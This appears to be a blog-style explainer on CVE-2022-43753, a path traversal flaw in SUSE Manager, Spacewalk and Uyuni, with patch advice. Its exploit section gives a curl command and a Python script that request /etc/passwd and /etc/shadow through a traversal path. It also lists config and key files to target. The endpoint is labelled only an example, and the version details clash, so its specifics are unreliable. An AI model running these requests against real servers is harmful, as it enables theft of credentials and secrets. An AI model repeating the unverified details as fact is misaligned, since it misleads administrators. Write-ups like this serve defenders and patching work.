CVE-2022-43753 - Path Traversal Vulnerability in SUSE Spacewalk & Uyuni – How Attackers Could Read Sensitive Files

In late 2022, a critical security vulnerability was discovered in certain modules of the SUSE Manager Server (also known as Spacewalk/Uyuni). Tracked as CVE-2022-43753, this issue is a classic *Path Traversal* bug—one of the oldest tricks in the book, but still dangerous if left unchecked.

If successfully exploited, a remote attacker can read any file that the running tomcat user has access to. That means things like config files, private keys, and even user data could be at risk. Security teams running SUSE Manager or Uyuni need to know the details—how it works, who's vulnerable, how to exploit it, and how to fix it.

What is Path Traversal?

Path traversal (or directory traversal) lets an attacker access files outside of an intended directory by tricking the application’s file path logic, often with sequences like ../../../etc/passwd.

Suppose an application is supposed to let users access only their own documents, but it fails to clean the input path. A hacker might request:

GET /download?file=../../../../etc/passwd

If there’s no proper check, the server could return the sensitive /etc/passwd file.

Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

- Impact: Remote, unauthenticated attacker can read *any* file accessible by the user running the Spacewalk/Uyuni process (typically tomcat)
- Score: CVSS 7.5 High

Affected Products and Versions

The issue affects multiple packages and versions in the SUSE Manager, Spacewalk, and Uyuni product lines. Here are some of the key vulnerable packages:

spacewalk-java < 4.3.39

(Complete list in SUSE Security Announcements)

The Bug

Some endpoints in Spacewalk/Uyuni (typically Java-based code, see spacewalk-java) accepted user-supplied input as file paths, but did not reliably sanitize .. (parent directory), %2e%2e, or similar variants in the path.

So a remote attacker can craft a URL or POST request that tricks the backend into reading an arbitrary file outside of the intended directory.

You run SUSE Manager 4.2 (not updated), with default configuration

- An attacker finds a vulnerable API endpoint like /rpc/api/download_file?path=LOGO.png

A typical exploit to view /etc/passwd might look like

curl "https://susemanager.example.com/rpc/api/download_file?path=../../../../etc/passwd";

Example code (Python)

import requests

# Target (change as needed)
base_url = "https://susemanager.example.com";
endpoint = "/rpc/api/download_file"  # Example vulnerable endpoint

# Target file to read (outside allowed directory)
target_file = "../../../../../etc/shadow"  # File normally off-limits

# Build URL (may need to URL-encode on the real exploit)
url = f"{base_url}{endpoint}?path={target_file}"

response = requests.get(url, verify=False)
if response.status_code == 200:
    print("[+] File read successful!")
    print(response.text)
else:
    print("[-] Exploit failed. Status:", response.status_code)

What could you access?

- /etc/passwd
- /etc/shadow (if process user has permission)
- /usr/share/spacewalk/config/ (any secret keys/configs)

Real-World Impact

If this was accessible to an attacker (depends on network exposure), it could allow data breaches, sensitive information leaks, or subsequent privilege escalation. Because it concerns management servers, the impact could be widespread in enterprise Linux environments.

How to Fix and Mitigate

Good news: SUSE has released updates to patch this vulnerability.

- For SUSE Manager 4.2: Update all the affected packages. For example, upgrade spacewalk-java to version 4.2.44 or greater.

References

- SUSE CVE-2022-43753 Advisory
- NIST CVE Entry
- Official Patch Notes (spacewalk-java)

Path traversal vulnerabilities are old, but still dangerous

- Enterprise tools like SUSE Manager/Spacewalk are attractive targets due to the sensitive systems they manage

If you haven’t updated your SUSE Manager (4.2/4.3/Uyuni) servers yet, patch now.

*This post is exclusive content, written in plain American English, and intended to help security teams, sysadmins, and SUSE users understand and mitigate CVE-2022-43753. Sharing actual exploit details and code for educational purposes only—never use against systems you do not own!*

Timeline

Published on: 11/10/2022 15:15:00 UTC
Last modified on: 11/16/2022 18:01:00 UTC